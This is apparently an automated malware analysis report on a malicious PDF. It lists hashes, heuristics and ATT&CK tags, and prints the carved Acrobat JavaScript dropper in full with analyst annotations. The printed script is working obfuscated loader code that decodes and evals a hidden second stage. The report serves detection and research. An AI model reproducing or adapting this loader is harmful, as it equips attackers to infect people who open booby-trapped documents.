Malicious PDF — malware analysis report

Static analysis result for SHA-256 766970258b5ced06…

MALICIOUS

PDF

7.4 KB Created: 2010-09-16 18:55:19 Authoring application: Tolhipezorojpagiwaqo (via 761a2Seueganadazaqeav)
MD5: e4411f2566aaea0691d6031b0263797d SHA-1: 2711b91a4e00b7920bf4f8e8da0d2576d76ee9d9 SHA-256: 766970258b5ced06f5b5ef4338c0600ec80dcc2a105163ec3f9feac3e33acbee
106 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF contains obfuscated JavaScript, indicated by multiple heuristic firings related to JavaScript actions and obfuscated name objects. The embedded JavaScript stream, named 'javascript_obj0011_000.js', is likely responsible for downloading and executing a secondary payload. The ML classifier strongly flags this PDF as malicious, supporting the conclusion that it is part of a malicious document delivery chain, likely via spearphishing.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9954

Heuristics 3

  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0011_000.js
e2d41866c9fb013feb60cefe8b41892c7277decb0774febb940ce493b1221654
pdf-javascript-stream | PDF /JS object 11 at offset 0x1387 | 2332 bytes
Preview script
First 1,000 lines of the extracted script
// Analyst annotation of the carved Acrobat JavaScript (object 11). The code is
// left byte-identical; comments describe what the visible lines do so the
// loader can be matched by detection logic without re-running it.
//
// Overall shape: the script assembles sensitive identifiers from string
// fragments and reversed literals, strips filler characters out of a long
// encoded string `h`, delays via ~50 levels of recursion, and then passes the
// decoded `h` to eval. Every error is swallowed into app.alert at the bottom.
//
// NOTE(review): `mROH` is declared here, reassigned on the `var mROH=new tU(b)`
// line below, and read back through the global name inside tU.prototype.lUT.
var mROH = null;

try {

// Property names are built from fragments so plain substring scanners do not
// see "length" / "charAt": zMR -> "length", kNMF + jI -> "charAt" (joined in
// app.zYZ below).
var zMR=new String("len"+"gth");
var jI=String("rAt");
var kNMF=String("cha");
// `this` at the top level of a document script; presumably the Acrobat Doc
// object — the decoded `h` calls getPageNumWords/getPageNthWord on it.
var b=this;
// Recursion bound, step and start value for tU.prototype.lUT below.
var tS=50;
var sVGH=1;
var vOR=0;


// Filler alphabet: every '8', '~', '@' and 'Z' in `h` is noise and is removed
// by the .replace() call further down.
var eNMP=/[8~@Z]/g;

// Constructor: stores the object passed in as this.v (instantiated with `b`).
function tU(sPUB){
this.v=sPUB;
};


// Second-stage source, padded with the filler characters matched by eNMP.
// With the filler stripped it starts `var aXAL=this.v; l='getPageN'; ...` and
// builds the names getPageNthWord / getPageNumWords, 'eval', 'parseInt',
// 'fromCharCode', 'charCodeAt', 'substr'. It reads the words of the current
// page (aXAL[hUX](aXAL[hCH], i, true)), hex-decodes them with parseInt(..,16),
// XORs each byte with 91, rebuilds a "\xNN..." string and hands it to
// app.eval — i.e. the real payload is hidden in the page text, not in this
// stream. Detection: the decoded string is plain ASCII once the four filler
// characters are removed, so `replace(/[8~@Z]/g,'')` on this literal is a
// cheap way to expose the stage-2 API names.
var h="va~r8 8a@X~AZLZ=Zt~hZi~s8.Zv@;Zl@=Z\'ZgZe~t8P@a@gZeZNZ\'8;8h8U@XZ=8l~+Z\'Zt~hZWZo~r~d~\'Z;ZxZAZL~=Zl~+Z\'@uZm@W@o~r8d8s@\'Z;~h@C@H~=8\'@p@a@g8e@N8uZmZ\'Z;~r8O~PZQZ 8=Z ~9@1Z @;8v8K~N@=8\'8\'~;8m@H8K~N8=~\'8j@o@iZn~\'@;8bZY8L~W8=Z\'~\'8;~vZOZR8=Z0~;~h8C8N@=ZSZt~rZiZn8g8;@nZY~X8=~\'8s8u8bZs@tZrZ\'8;Zw8H8A@BZ=~\'8e8v8a~l~\'Z;@z@M@R@=8\'@l@e8n~g8t8hZ\'Z;@v8I@=@\'~\\@\\8x~\'8;8xZW@L@=8\'8t8oZS@t8r@iZn@g8\'~;@lZW~R@=Z\'~p~a~rZs@e8IZn8t~\'@;ZbZQZR~=~\'8f8r@o@m8C@hZa8r@C8o@dZe@\'Z;ZfZS8J@=Z\'8c~hZaZrZC@oZd~e~A@tZ\'Z;@s@V8GZHZ=@4~/Z4Z;~p~C@X8=@18+Z4~;@zZYZJ@=@2~0@0@+85~5@;8b8=~\'8d8o8c~\'8;8t8W@D@A@=@383@2@;@e8N8A@DZ=~[8]8;Zs8X@M8J~=Z\'@\'8;@t~Y~LZM@=Z1@6Z;Zt8W~R~=82@;@m8NZGZF@=Z4@;Zd8G8=Za~X8AZL8[~xZAZL~]Z(8a@X8A~LZ[Zh@C8H@]@)Z;Zf@o8rZ(@hZG~NZ=@v~O~R@;Zh~G~NZ<8 Zd8GZ;Z @h8G@N~+@+Z)8{8v8a8r8 Zq8L8O~H~=@a8X@AZL@[@h8U8X~]@(8aZX~A@L~[8h~C@HZ]~,~h@G@N@,8t8rZu~e~)8;@b@Y@L@W~=@[@bZY8L@WZ,@q8L~O8H8]8[@mZHZKZN~]~(@v~KZN8)8;~;~}~f~o~r8(~h~G@N@=Z0@;8h~G@NZ @<8 Zb~Y8L8WZ[@zZM8R~]Z;~ 8h@G8N@+Z=~tZW8RZ)@{@j8=ZbZYZLZW@[ZnZY@X~]@(8h@GZN~,~t~WZR8)~;~t~W8=8p@a~r@s8eZI8n@tZ(~j@,8t8YZLZM8)8;Zw@D@K@VZ=8tZW~^~rZO~P@Q8;8f8=Zw@D@K@VZ.~t8o~S8t~r8i~nZg~(@t8Y~L8M8)~;8f~=@(8fZ[@z~M8RZ]~=8=8s@VZG~H~)8 ~?~ Z\'80~\'@ 8+~ Zf@ @:Z @f8;@e~N8A~D@.8p@uZsZh@(8fZ)@;Z}~tZr~y~ 8{Zs~X~MZJZ=@n@e8w@ 8S@t8r@i8n8gZ(Zv@I8 ~+~ ~e8N@AZD8[@m@H@KZN@]8(@v~I@)~)8;~a~p~p~[@w~H@AZB@]~(@\'Zs~X~M@J8=Z\"8\'@+8sZX8M~J~+Z\'Z\"8;~\'~)~;@a8XZA~L8.Zl@W@T8=@(Zs@X~M@JZ[8n~Y~X8]@(Zs~X~MZJ~[@z8MZR~]@-~t~W~D8A@)8)~;~a~X8A@L@.@x@U~D~=~(8s@X~MZJ~[8nZY~X8]Z(~v8O~R~,Zs@X8M@J8[@zZM8RZ]Z-8t@W8D@AZ)8)Z;8rZO~D8(@)8;~}@ Zc~a8t~c8hZ(Zb@Q@J~)@{8iZf8(ZaZXZA~L@.~x8UZDZ)@{~t@r@y8 8{~a~p@p~[8w~HZA@BZ]~(8a8X@A@L~.8x~U8DZ)~;~}@ ~c@a~tZcZh8(ZbZQZJZ)@{Z}@}@ 8e@l@s8e@ @{8}~}8";


// String-reverse helper hung off the Acrobat `app` object (so the function
// shows up as app.zYZ rather than as a plain global). `dMH` and `hGN` are
// implicit globals. The loop starts at xGV.length, where charAt() yields "",
// and walks down to index 0, so the result is xGV reversed.
app.zYZ=function(xGV){

dMH='';
var jCH = kNMF + jI;
for(hGN=xGV[zMR];hGN >= 0;hGN--){
 dMH+=xGV[jCH](hGN);
}

return dMH;
}

var zYZ=app.zYZ;

// Reversed literals: "lave" -> "eval", 'epytotorp' -> "prototype". Only wHAB
// is used later in the visible code; tOH is not referenced again here.
wHAB=zYZ("la"+"ve");
tOH = app.zYZ('epytotorp');

// Remove the filler characters; `h` is now the stage-2 script described above.
h=h.replace(eNMP, '');


tU.prototype={

// Recurses through the global `mROH` until the counter exceeds tS (50), then
// calls this.v.eval(h) — this.v is the object captured as `b=this` above.
// The recursion is most likely a cheap delay / sandbox-evasion step rather
// than computation; it performs no other work.
lUT : function(nMX){
if(nMX > tS){
this.v[wHAB](h);
} else {
mROH.lUT(nMX+sVGH);
}
},
};

// Bind the loader to the captured Doc object and start the counter at 0.
var mROH=new tU(b);

mROH.lUT(vOR);

// Any failure (e.g. API not available in a viewer without Acrobat JS) is
// surfaced as a dialog instead of propagating.
} catch(sXMJ){
app.alert(sXMJ);
}